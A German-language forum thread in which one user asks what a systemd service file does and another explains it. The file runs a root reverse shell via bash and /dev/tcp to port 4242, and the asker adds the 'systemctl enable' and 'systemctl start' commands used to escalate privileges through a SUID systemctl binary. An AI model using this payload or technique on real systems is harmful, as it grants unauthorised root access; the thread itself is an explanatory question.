was macht dieser code?

1 Antwort

Das ist eine Service-Datei, die von Systemd gestartet wird.

[Unit]

Description=root

Das ist die Beschreibung des Services (hier einfach "root").

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/4242 0>&1'

Hier wird festgelegt, dass der Typ des Services "simple", also einfach ist, das Service vom Benutzer "root", also dem Administrator, ausgeführt wird. Der ausgeführte Befehl ist dabei das Öffnen einer interaktiven Bash-Shell, alle entstehenden Ausgaben werden via TCP an den Port 4242 gesendet.

[Install]
WantedBy=multi-user.target

Das Service wird an einer bestimmten Stelle (einem sog. Target) des Boot-Vorgangs gestartet.

verreisterNutzer  28.03.2022, 09:42

danke erstmal, aber Ich verstehe nicht ganz wie dieser simple code mich als root user einloggt. der code wurde auf einem linux system verwendet und nutzt dabei die SUID von der systemctl um halt diese shell als root zu generieren.

ausgeführt wurde der code auf dem system mit "systemctl enable /tmp/root.service" und "systemctl start root", von einem user ohne root privileges

könntest du vielleicht nochmal diese beiden befehle erklären und erklären warum mir genau "systemctl" diese rechte ermöglicht und nicht jede andere SUID datei auch?